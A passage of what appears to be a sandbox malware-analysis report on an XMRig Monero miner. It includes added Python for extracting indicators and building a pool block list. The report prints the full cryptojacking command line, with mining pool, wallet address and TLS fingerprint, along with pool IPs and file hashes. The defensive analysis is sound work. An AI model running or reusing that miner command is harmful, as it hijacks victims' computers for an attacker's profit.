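    if "url" in opts:
        ioc.pool_host, ioc.pool_port = _split_pool(opts["url"])
    ioc.wallet = opts.get("user")
    ioc.wallet_is_monero = bool(ioc.wallet and MONERO_ADDR.match(ioc.wallet))
    ioc.tls = bool(opts.get("--tls"))
    ioc.tls_fingerprint = opts.get("tls_fingerprint")
    if opts.get("donate_level", "").isdigit():
        ioc.donate_level = int(opts["donate_level"])

    if "xmrig" in ioc.image.lower():
        ioc.reasons.append("image name contains 'xmrig'")
    if ioc.wallet_is_monero:
        ioc.reasons.append("--user is a Monero wallet address")
    if ioc.tls_fingerprint and SHA256_HEX.match(ioc.tls_fingerprint):
        ioc.reasons.append("pool TLS certificate pinned by SHA-256 fingerprint")
    if ioc.donate_level is not None:
        ioc.reasons.append("--donate-level is an XMRig-specific option")
    if ioc.tls and ioc.pool_port not in (None, 443):
        ioc.reasons.append(f"TLS to non-standard port {ioc.pool_port}")
    return ioc


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        r = parse_xmrig_cmdline(line)
        print(f"{r.image}: miner={r.is_miner} pool={r.pool_host}:{r.pool_port} reasons={r.reasons}")
```

Feed it the CommandLine field of process-creation telemetry (Sysmon event 1, EDR process events) rather than image names alone: the wallet, pool and fingerprint survive a renamed binary, and the same three values are what to pivot on across the other runs on this page.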
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.179.89.13.in-addr.arpa | udp |
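Read together with the other runs, this table shows the pool name resolving to 45.76.89.70 here and in behavioral9 but to 95.179.241.203 in behavioral4, so blocking an IP would miss the next run; block the name and alert on the pinned fingerprint instead. The in-addr.arpa rows are reverse lookups of peers the guest talked to and are environment noise rather than miner behaviour. The added example below, which is not part of the sandbox report, turns such a table into per-domain indicators, counts the PTR noise, tolerates a row whose protocol has slipped into the domain column (one such row appears in the behavioral4 table), and emits a block list for anything labelled as a pool. The pool-name patterns and the github/bing labels are this example's own constructed lists.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Set

# Constructed input: the 20 rows of this run's network table, one pool row
# from behavioral4 (where the pool resolved to a different IP), and one row
# whose protocol landed in the domain column, as happens in exported tables.
SAMPLE_ROWS = """
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.179.89.13.in-addr.arpa | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 52.111.227.14:443 | tcp | |
"""

# Small constructed list of pool naming patterns; extend it from your own intel.
POOL_NAME = re.compile(r"(^|[.-])(pool|stratum|xmr|mine)[.-]|hashvault|supportxmr|nanopool|2miners", re.I)


@dataclass
class DomainInfo:
    queried: bool = False                          # a DNS query for this name was seen
    dests: Set[str] = field(default_factory=set)   # ip:port actually connected to
    label: str = "unknown"


@dataclass
class NetSummary:
    domains: Dict[str, DomainInfo] = field(default_factory=dict)
    unnamed: Set[str] = field(default_factory=set)  # connections with no DNS name
    ptr_lookups: int = 0


def classify(domain: str) -> str:
    if POOL_NAME.search(domain):
        return "mining-pool"
    if domain.endswith(("github.com", "githubusercontent.com")):
        return "payload-hosting"   # where the dropper fetches the xmrig release from
    if domain.endswith("bing.com"):
        return "os-noise"          # Windows background traffic in the sandbox image
    return "unknown"


def parse_rows(table: str):
    """Yield (destination, domain, proto) from the markdown-style table."""
    for line in table.strip().splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Country":
            continue
        _country, dest, domain, proto = cells
        if proto == "" and domain in ("tcp", "udp"):   # shifted row: proto sits in the domain column
            domain, proto = "", domain
        yield dest, domain, proto


def summarize(table: str) -> NetSummary:
    s = NetSummary()
    for dest, domain, proto in parse_rows(table):
        if domain.endswith(".in-addr.arpa"):
            s.ptr_lookups += 1           # reverse lookups of peers; environment noise
            continue
        if not domain:
            s.unnamed.add(dest)
            continue
        info = s.domains.setdefault(domain, DomainInfo(label=classify(domain)))
        if proto == "udp" and dest.endswith(":53"):
            info.queried = True
        else:
            info.dests.add(dest)
    return s


def blocklist(s: NetSummary) -> List[str]:
    """The domain plus every observed ip:port for anything labelled as a pool."""
    out = []
    for name, info in s.domains.items():
        if info.label == "mining-pool":
            out.append(name)
            out.extend(info.dests)
    return sorted(out)


if __name__ == "__main__":
    summary = summarize(SAMPLE_ROWS)
    for name, info in summary.domains.items():
        print(f"{name:32} {info.label:16} queried={info.queried} dests={sorted(info.dests)}")
    print("PTR noise rows:", summary.ptr_lookups, "unnamed:", sorted(summary.unnamed))
    print("block:", blocklist(summary))
```

The block list is deliberately domain-first: the two pool IPs differ between runs of the same sample, and the --tls-fingerprint pin on the command line identifies the pool's certificate regardless of which address answers.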
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3084-16-0x0000016EF0800000-0x0000016EF0820000-memory.dmp
memory/3084-17-0x0000016EF0850000-0x0000016EF0870000-memory.dmp
memory/3084-18-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-19-0x0000016EF2130000-0x0000016EF2150000-memory.dmp
memory/3084-20-0x0000016EF2150000-0x0000016EF2170000-memory.dmp
memory/3084-21-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-22-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-24-0x0000016EF2130000-0x0000016EF2150000-memory.dmp
memory/3084-23-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-25-0x0000016EF2150000-0x0000016EF2170000-memory.dmp
memory/3084-26-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-27-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-28-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-29-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-30-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-31-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-32-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-33-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-34-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-35-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-36-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-37-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-38-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-39-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-40-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-41-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-42-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-43-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-44-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-45-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-46-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-47-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-48-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-49-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-50-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-51-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-52-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-53-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-54-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-55-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-56-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-57-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-58-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-59-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-60-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-61-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-62-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-63-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-64-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-65-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-66-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-67-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-68-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-69-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-70-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-71-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-72-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-73-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-74-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-75-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-76-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-77-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-78-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-79-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-80-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-81-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-82-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-83-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-84-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 15:51
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1020 wrote to memory of 3204 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1020 wrote to memory of 3204 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.211.222.173.in-addr.arpa | udp |
| US | 52.111.227.14:443 | | tcp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.117.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3204-16-0x000002451AE20000-0x000002451AE40000-memory.dmp
memory/3204-17-0x000002451AE50000-0x000002451AE70000-memory.dmp
memory/3204-18-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-19-0x000002451AE70000-0x000002451AE90000-memory.dmp
memory/3204-20-0x000002451AE90000-0x000002451AEB0000-memory.dmp
memory/3204-21-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-22-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-25-0x000002451AE90000-0x000002451AEB0000-memory.dmp
memory/3204-24-0x000002451AE70000-0x000002451AE90000-memory.dmp
memory/3204-23-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-26-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-27-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-28-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-29-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-30-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-31-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-32-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-33-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-34-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-35-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-36-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-37-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-38-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-39-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-40-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-41-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-42-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-43-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-44-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-45-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-46-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-47-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-48-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-49-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-50-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-51-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-52-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-53-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-54-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-55-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-56-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-57-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-58-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-59-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-60-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-61-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-62-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-63-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-64-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-65-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-66-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-67-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-68-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-69-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-70-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-71-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-72-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-73-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-74-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-75-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-76-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-77-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-78-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-79-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-80-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-81-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-82-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-83-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-84-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 16:00
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2140 wrote to memory of 2360 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2140 wrote to memory of 2360 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| NL | 23.62.61.185:443 | www.bing.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| NL | 23.62.61.185:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.73.50.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2360-16-0x0000021688950000-0x0000021688970000-memory.dmp
memory/2360-17-0x000002168A160000-0x000002168A180000-memory.dmp
memory/2360-18-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-19-0x000002168A180000-0x000002168A1A0000-memory.dmp
memory/2360-20-0x000002168A1A0000-0x000002168A1C0000-memory.dmp
memory/2360-21-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-22-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-25-0x000002168A1A0000-0x000002168A1C0000-memory.dmp
memory/2360-24-0x000002168A180000-0x000002168A1A0000-memory.dmp
memory/2360-23-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-26-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-27-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-28-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-29-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-30-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-31-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-32-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-33-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-34-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-35-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-36-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-37-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-38-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-39-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-40-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-41-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-42-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
memory/2360-43-0x00007FF6A2000000-0x00007FF6A2B03000-memory.dmp
